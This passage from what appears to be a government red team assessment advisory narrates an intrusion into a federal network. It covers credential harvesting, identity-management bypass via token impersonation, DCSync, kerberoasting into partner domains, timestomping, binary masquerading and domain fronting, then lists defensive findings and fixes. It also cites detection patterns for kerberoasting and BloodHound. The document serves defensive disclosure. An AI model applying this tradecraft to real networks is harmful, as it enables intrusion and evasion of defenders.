Internal network information was freely available to unprivileged, domain-joined users, and the team queried hundreds of megabytes of Active Directory (AD) data using a custom rewrite of dsquery.exe in .NET and Beacon Object File (BOF) ldapsearch from the phished user’s workstation. The team then data mined numerous internal file servers for accessible shares [T1083]. The team found a password file left from a previous employee on an open, administrative IT share, which contained plaintext usernames and passwords for several privileged service accounts. With the harvested Lightweight Directory Access Protocol (LDAP) information, the team identified one of the accounts (ACCOUNT 3) had system center operations manager (SCOM) administrator privileges and domain administrator privileges for the parent domain. They identified another account (ACCOUNT 4) that also had administrative permissions for most servers in the domain. The passwords for both accounts had not been updated in over eight years and were not enrolled in the organization’s identity management (IDM).

Lateral Movement and Persistence

The team used valid accounts and/or tokens with varied techniques for lateral movement. Techniques included scheduled task manipulation, service creation, and application domain hijacking [T1574.014]. For credential usage, the implemented IDM in the organization’s network hampered the red team’s ability to pivot as it blocked common credential manipulation techniques like pass-the-hash [T1550.002] and pass-the-ticket [T1550.003]. The red team found ways to circumvent the IDM, including using plaintext passwords to create genuine network logon sessions [T1134.003] for certain accounts not registered with the IDM, as well as impersonating the tokens of currently logged-in users to piggyback off valid sessions [T1134.001].

The red team tailored payloads to blend with the network’s environment and did not reuse IOCs like filenames or file hashes, especially for persisted implants. Remote queries for directory listings, scheduled tasks, services, and running processes provided the information for the red team to masquerade as legitimate activity [T1036.004].

The team emulated normal network activity by installing HTTPS beaconing agents on workstations where normal users browse the web, establishing internal network pivots with TCP bind and SMB listeners. They primarily relied on creating Windows services as their persistence mechanism.

The red team used the data mined credentials for ACCOUNT 3 to move laterally from the workstation to a SCOM server. Once there, using ACCOUNT 4, the team targeted a Systems Center Configurations Manager (SCCM) server, as it was an advantageous network vantage point. The SCCM server had existing logged-in server administrators whose usernames followed a predictable naming pattern (correlating administrative roles and privilege levels), allowing them to determine which account to use to pivot to other hosts. 

The team targeted the organization’s jump servers frequented by highly privileged administrative accounts. Red team operators used stolen SCCM server administrator credentials to compromise one of the organization’s server-administrator jump hosts. They learned that the organization separated some, but not all, accounts onto separate jump servers by role (e.g., workstation administrators and server administrators had separate jump points, but server and domain administrators occasionally shared the same jump hosts). Once a domain administrator logged in, the red team stole the administrator’s session token and laterally moved to a domain controller where they pulled credentials for the entire domain via DCSync [T1003.006], obtaining full domain compromise (see Figure 5).

Figure 5: Exploitation of the Windows Domain

After compromising the domain, the team confirmed access to sensitive servers, including multiple high value assets (HVAs) and tier zero assets. None of the accessed servers had any noticeable additional protections or network access restrictions despite their sensitivity and critical functions in the network. Remote administration and access of these critical systems should be restricted to designated, role-based accounts coming from specific network enclaves and/or workstations. Isolation with these access vector limitations protects them from compromise and sharply reduces the associated noise, allowing defenders to more easily identify abnormal behavior.

Pivoting Into External Trusted Partners

The team inspected the organization’s trust relationships with other organizational domains through LDAP [T1482] and identified connections to multiple external FCEB partner organizations, one of which they subsequently used to move laterally.

The team pulled LDAP information from PARTNER DC 1 and kerberoasted the domain, yielding one valid service account with a weak password they quickly cracked, but the team was unable to move laterally with this account because it lacked appropriate privileges. However, PARTNER 1 had trusted relationships with a second partner’s domain controller (PARTNER DC 2). Using the acquired PARTNER 1 credentials, the red team discovered PARTNER 2 also had a kerberoastable, highly privileged administrative service account whose password cracked, allowing the team to laterally move to a PARTNER 2 host from the original victim network (see Figure 6).

figure 6: path of exploitation into external fceb organizations

These cross-organizational attack paths are rarely identified or tested in regular assessments or audits due to network ownership, legal agreements, and/or vendor opacity. However, they remain a valuable access vector for advanced persistent threat (APT) actors.

Experimentation with access into trusted partner domains included the modification of local system firewall rules on the source domain controller to allow specific source and destination IPs. The organization’s host-based monitoring systems failed to identify the addition and removal of the red team’s firewall exceptions.

Defense Evasion Techniques

Solaris Enclave Figure 5: Exploitation of the Windows Domain

Due to the lack of application allowlisting, the red team regularly masqueraded as legitimate software to remain undetected by the organization’s network defenders [T1036]. Additionally, by default, command auditing in Solaris via the lastcomm command only captures the program being run—full file path and any command line arguments are not recorded. For example:

• A real file: /opt/splunkforwarder/bin/splunkd
• A malicious copy: /opt/splunkforwarder/splunkd
• Command auditing logs: splunkd

The team also hid common artifacts to obfuscate their operational activity, including modifying file timestamps [T1070.006] and permissions with the touch and chmod/chown commands [T1222.002] to blend with other files in the environment.

Windows Domain

The team used a diverse range of accounts, backdoors, and C2 channels with different network footprints to obfuscate activity [T1027].

Diversification of account usage, backdoors, and C2 channels further obfuscated red team activity in the domain. Lateral movement to new hosts featured a variety of accounts to reduce the risk of detection. When harvesting credentials, the team selected several backup accounts for each role (e.g., server admin, workstation admin, domain admin, service accounts) in case the intended account was locked, disabled, or flagged as compromised.

To emphasize the value of tool-agnostic/behavior-based detections, the red team deployed over seven different implants to mimic real-world adversaries’ diverse use of open source, commercial off-the-shelf (COTS), and custom RATs. Each featured different host and network signatures to evade out-of-the-box EDR detections and every implant had unique artifacts both on-disk and in-memory. The team also evaded EDR/AV by using proprietary loaders and beacon object files (BOFs) to make direct API calls and allow self-injection of .NET executables to run additional capabilities.

All the deployed tools had different network C2 channel footprints. Some beaconing agents connected via HTTPS to legitimate domains owned by the red team. Others used domain fronting [T1090.004] to leverage common content delivery network (CDN) functionality. Outbound traffic sent to public websites not owned by the red team had a Host header that told the CDN provider it should redirect traffic to red-team-controlled IP addresses. Internal pivots used SMB on port 445 and TCP bind listeners on ephemeral high ports. The team tailored both to mimic named pipes and network connections already seen in the domain and evade detection.

Collaborative Phase

Five months into the assessment, the red team officially notified the organization’s security operations center (SOC) of the ongoing activity and began engaging directly with SOC leadership. At this point, the organization had not submitted deconflictions and did not appear to be actively investigating CISA SILENTSHIELD assessment activity.

During this phase, CISA refrained from providing TTPs or IOCs (such as concrete hosts, filenames, or C2 domains) to allow the organization to develop and test its own detection metrics. The team held weekly discussions with the organization’s senior technical staff, SOC, and system administrators, which led to measurable improvements in response times for known techniques and behavior-based detections that uncovered previously unknown tradecraft. Specifically, the red team worked with the organization to assist them with synthesizing the following data sources to identify the extent of the red team’s compromise:

• EDR alerts;
• YARA scans;
• C2 domains and techniques;
• Internal pivot hosts;
• Admin accounts used to pivot;
• Memory dumps, revealing attempts to pass credentials; and
• Email logs documenting the initial breach via phishing.

Every cyber threat actor has a unique set of TTPs. Nevertheless, nearly all adversaries perform the same basic steps:

• Command execution (initial access and lateral movement);
• Establish C2 channels and exfiltrate data;
• Establish persistence;
• Escalate privileges; and
• Use and abuse credentials.

All TTPs have corresponding artifacts, but not all IOCs are created equal. Fixating on a hyper-focused set of IOCs can catch known threats but impedes efforts to identify unknown adversaries employing different TTPs.

Major themes discussed during this phase that improved the organization’s behavior-based detection capabilities included log collection, forensic analysis, relying on IOCs for detection, monitoring and investigation management, and Sysmon misconfigurations.

Log Collection

The assessed organizations had ineffective and insufficient logs, and network defenders were not using logs to proactively detect anomalous behavior. With the red team’s assistance, the organization identified logging issues caused by hardware failures, limited backups, network bandwidth, and limited log collection and retention policies (only 60–90 days). In other cases, critical data was captured but not analyzed because artifacts were moved to cold storage.

The organization’s network defenders identified procedural and other roadblocks when attempting to acquire new forensic data. For example, affected servers could not be taken offline for imaging because there was no process in place to do so without impacting the organization’s operations. Additionally, attempts to capture forensic data via packet captures occurred directly on the compromised Solaris and Windows hosts, where the red team observed the data being collected and therefore had the opportunity to disrupt collection, tamper with evidence files, and better adapt and evade their defenses.

Forensic Analysis

Defenders did not monitor C2 egress via DNS. They believed their parent entity was monitoring their DNS traffic, absolving them of a need to collect and monitor logs for their analyses.

Forensic analysts blindly trusted the timestamps for files and persistence mechanisms without realizing they had been tampered with. Bogus times added to persistence mechanisms (such as scheduled tasks) led defenders to misjudge the timeline of the breach. Red team operators regularly adjusted the last-modified timestamp of files and folders—using either the native touch -r command or implants’ timestomp command to disguise the last-modified timestamp captured in the output of ls –la. Secondary file timestamps identified with ls -lu or ls -lc would have revealed abnormal file attributes, in addition to more reliable anomalies found during proper forensic investigation.

Reliance on Known IOCs

The red team used diversified TTPs in the Adversary Emulation phase to reflect the ability of cyber threat actors to bypass conventional, known-bad detection strategies. The network defenders did not detect much of the team’s activity. For example:

• After identifying a red team payload, network defenders wrote tailored YARA rules that signatured specific behavior of the red team’s loader, which uncovered several similar payloads but failed to catch any of the other six C2 frameworks.
• Organization network defenders used a combination of custom and open source detection rules (such as CommandLine=kerberoast* or files called bloodhound.zip) and did not detect the team’s kerberoasting activity.

Regular Monitoring and Investigation Management

Conversations with SOC leadership revealed several procedural issues that led to slow or incomplete analysis of the red team’s intrusion and activity. For example:

• While EDR products detected and quarantined several of the red team’s tools, including the initial phishing payload, the organization’s daily procedures did not always include review of EDR alerts. The red team worked with the organization to ensure rapid response to EDR alerts became a fundamental part of network defenders’ daily workflows. This allowed SOC personnel to identify new attempts at lateral movement.
• Solaris network owners discovered that several firewalls had inadvertently been misconfigured or disabled. The organization’s technical teams worked directly with the red team to fix errors and to reorganize and revalidate the network topology.
• Network defenders had poor operational security and alerted the red team of investigations. For example:
  • In one instance, after receiving incoming beacons from what was evidently a sandboxed environment, the payload was not renamed from its original file, allowing the red team to immediately identify how much of their access was under scrutiny. Organizations must ensure sandboxed environments are safe, secure, and thoroughly sandboxed.
  • The red team observed system administrators reviewing forensic artifacts tied to the team’s Solaris payload—searching for files, running packet captures for outbound C2 traffic, and port scanning the C2 redirector. Team members simply reinstalled their persistence with a new redirector and file path, sidestepping the informal investigation.
• IT teams were siloed from the SOC, who had no knowledge of the system administrator’s weeks long investigation into the anomalous network behavior.
• While the organization compartmented most of its threat hunting and incident response in a separate domain, staff still used the compromised corporate domain accounts to communicate the details of active investigations and assessments.

Sysmon Misconfigurations

The red team had a productive exchange with the organization on their Sysmon configuration, which the team abused throughout the assessment. The red team identified several misconfigurations:

• Deployment teams pushed the ruleset (stored as a .xml file) to a globally readable C:Windows directory. There were no rules in place to catch adversaries reading the configurations from disk or the registry. As a result, CISA’s red team was provided explicit file paths to safely place their payloads.
• Rules targeted a single, tool-specific IOC rather than a technique (e.g., sc.exe rather than service creation events).
• Exceptions were overly permissive (for example, excluding all Image entries anywhere in C:Program Files (x86)GoogleUpdate*).

LESSONS LEARNED AND KEY FINDINGS

The red team noted the following lessons learned and key findings relevant to the security of the assessed organization’s network. These specific findings contributed to the team’s ability to gain persistent access across the organization’s network. See the Mitigations section for recommendations on how to address these findings.

Lesson Learned: The assessed organization had insufficient controls to prevent and detect malicious activity.

• Finding #1: The organization’s perimeter network was not adequately firewalled from its internal network, which failed to restrict outbound traffic. A majority of the organization’s hosts, including domain controllers, had internet connectivity to broad AWS EC2 ranges, allowing the red team to make outbound web requests without triggering IDS/IPS responses. These successful connections revealed the lack of an application layer firewall capable of detecting protocol mismatches on common ports.
• Finding #2: The assessed organization had insufficient network segmentation. The lack of network segmentation allowed the red team to move into, within, and out of both the Solaris and Windows domain. This also enabled them to gather a massive amount of data about the organization and its systems. Internal servers could reach almost any other domain host, regardless of type (server vs. workstation), purpose (user laptop, file server, IDM server, etc.), or physical location. Use of network address translation (NAT) between different parts of the network further obfuscated data streams, hindering incident response.
• Finding #3: The organization had trust relationships with multiple partner organizations, which—when combined with weak credentials and network connectivity—allowed the red team to exploit and move laterally to a partner domain controller. This highlights the risk of blindly allowing third party network connectivity and the importance of regularly monitoring both privileged access and transitive trusted credential material.
• Finding #4: The organization’s defensive staff did not sufficiently isolate their defensive investigative activity. Organizations should always communicate information pertaining to suspected incidents out-of-band, rather than from within a domain that they know to be compromised. While the defensive systems were shunted to another domain with correct (one-way) trusts, the red team identified a likely attack vector to that domain via the same, previously compromised IDM server. Some analysts also performed dynamic analysis of suspected implants from an internet-connected sandbox, tipping the red team to the specific files and hosts that were under investigation.
• Finding #5: Network defenders were not familiar with the intricacies of their IDM solution. The CISA red team identified accounts not enrolled in the IDM and successfully used those and already existing user access tokens to bypass IDM. The appliance, in its active configuration, was not exhaustively tested against common credential manipulation techniques nor were any alerts on anomalous behavior being monitored.
• Finding #6: The organization had some role-based host segmentation, but it was not granular enough. The organization used clearly defined roles (server administrator and domain administrator) but did not sufficiently segregate the accounts to their own servers or systems, enabling privilege escalation.

Lesson Learned: The organization did not effectively or efficiently collect, retain, and analyze logs.

• Finding #7: Defensive analysts did not have the information they needed due to a combination of issues with collecting, storing, and processing logs. Other policies collected too much useless data, generating noise and slowing investigation.
• Finding #8: Network defenders’ daily procedures did not always include analysis of EDR alerts, and the tools that were installed only provided a 30-day retention for quarantined files. Consequently, investigators were unable to access timely information that may have led to earlier detection of the red team’s activity.
• Finding #9: Forensic analysts trusted host artifacts that could have been modified by an adversary. In particular, file timestamps and packet captures were scrutinized without considering the possibility of malicious tampering.

Lesson Learned: Bureaucratic communication and decentralized teams hindered the organization’s network defenders.

• Finding #10: The organization’s technical staff were spread across decentralized teams. Siloed team structure meant that IT, security, and other technical teams lacked consistency with their tools, creating too much noise for defenders to sift through.
• Finding #11: The SOC team lacked the agency to rapidly update or deploy rulesets through the fractured IT teams. The organization diffused responsibility for individual tools, such as Sysmon, across multiple groups, hampering timeliness and maintenance of a defensive posture.
• Finding #12: The organization’s forensics team produced an incident response report which documented the red team’s initial exploitation of the Solaris enclave. However, the report was limited in scope and did not adequately document the red team’s ability to expand and persist. The success of the red team’s first phase, using publicly known TTPs, illustrated the business risk to all Solaris hosts and, by extension, the Windows environment. Moreover, the organization’s internal report only focused on vulnerable servers and did not account for a cyber threat actor’s ability to expand and persist in the Solaris enclave.
  • The Solaris administrator’s investigations of the red team failed to appear in either the report or in SOC deconflictions. An admin’s inquiry into unusual and probably malicious activity, particularly in the middle of an investigation of confirmed breaches of adjacent hosts, should have been considered in the report as evidence of lateral movement.

Lesson Learned: A “known-bad” detection approach hampered detection of alternate TTPs.

• Finding #13: Defenders hyper-focused on specific IOCs, such as file attributes, particular C2 frameworks, or C2 domains. The organization’s network defenders did not initially employ tool-agnostic detections, causing them to positively identify some red team tools, but remain blind to the full extent of the compromise. They were accustomed to catching internal red teams that used specific TTPs; introducing a new “threat actor” with new TTPs sidestepped nearly all detections.
• Finding #14: Detection rules were visible from compromised systems, allowing the red team to sidestep detections based on hardcoded rules and exceptions.
• Finding #15: There was insufficient restriction of administrative tools. The technical staff lacked a standardized set of administrative tools, leaving all remote administration protocols available for use by admins, CISA red team, or adversaries. This also created excessive noise for defenders to effectively sift through to determine expected versus anomalous activity.
• Finding #16: There was insufficient tracking of software. There was no apparent approval or tracking process for software installation across the domain, preventing defensive analysts from identifying abnormal software placed by the red team. A comprehensive inventory of approved software would help defenders identify abnormal behavior and facilitate the deployment of application allow-listing.

NOTED STRENGTHS

The assessed organization promptly planned for and resolved multiple identified issues, including with:

• Windows service accounts: The organization eliminated over 30 percent of service accounts which were deemed unnecessary. There is an on-going effort to change service account passwords and apply DoD recommended STIG compliance (over 85 percent have been changed since the publication of this report).
• IDM: The organization is looking into how to improve their IDM implementation and apply additional security alerts and preventions for possible misuse of credentials. They plan to implement additional identity-based monitoring capabilities in front of tier zero assets.
• Egress: The organization implemented new processes to detect and prevent servers from anomalously egressing outside of the network to the internet.
• Host-based solutions: The organization used additional features of their antivirus software, such as reputation scores, to look for all executable file type outliers of to identify anomalous instances.
• Hosts: The organization decommissioned clusters of servers and completely rebuilt them from scratch after identifying numerous irreparable issues and misconfigurations.
• Solaris credentials: The organization changed passwords, removed SSH keys, restricted permissions, and removed unnecessary accounts.

MITIGATIONS

Network Defenders

CISA recommends organizations implement the recommendations in Table 1 to mitigate the findings listed in the Lessons Learned and Key Findings section of this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. See CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.